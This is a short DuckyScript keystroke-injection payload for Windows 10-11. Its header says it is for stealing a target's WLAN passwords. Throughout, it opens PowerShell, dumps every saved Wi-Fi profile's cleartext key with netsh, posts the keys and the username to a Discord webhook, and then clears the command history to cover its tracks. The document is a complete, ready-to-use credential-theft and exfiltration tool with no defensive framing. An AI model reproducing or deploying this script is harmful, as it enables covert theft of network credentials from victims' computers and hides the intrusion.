REM ###################################################################
REM #                                                                 |
REM # Title        : WLAN-Windows-Passwords-Discord-Exfil-W/O-ps1     |
REM # Author       : troodon7                                         |
REM # Description: A script used to steal target WLAN Passwords.      |
REM # Category     : Credentials                                      |
REM # Target       : Windows 10-11                                    |
REM # Version      : 1.0                                              |
REM #                                                                 |
REM ###################################################################

DEFINE #DISCORD www.yourwebhookhere.com/with-no-brackets-or-quotes

GUI r
DELAY 200
STRINGLN powershell -noexit
DELAY 2000
STRINGLN netsh wlan show profile | Select-String '(?<=All User Profile\s+:\s).+' | ForEach-Object {
STRINGLN $wlan  = $_.Matches.Value
STRINGLN $passw = netsh wlan show profile $wlan key=clear | Select-String '(?<=Key Content\s+:\s).+'
STRINGLN $Body = @{
STRINGLN 'username' = $env:username + " | " + [string]$wlan
STRINGLN 'content' = [string]$passw
STRINGLN }
STRINGLN Invoke-RestMethod -ContentType 'Application/Json' -Uri #DISCORD -Method Post -Body ($Body | ConvertTo-Json)
STRINGLN }
STRINGLN Clear-History
STRINGLN exit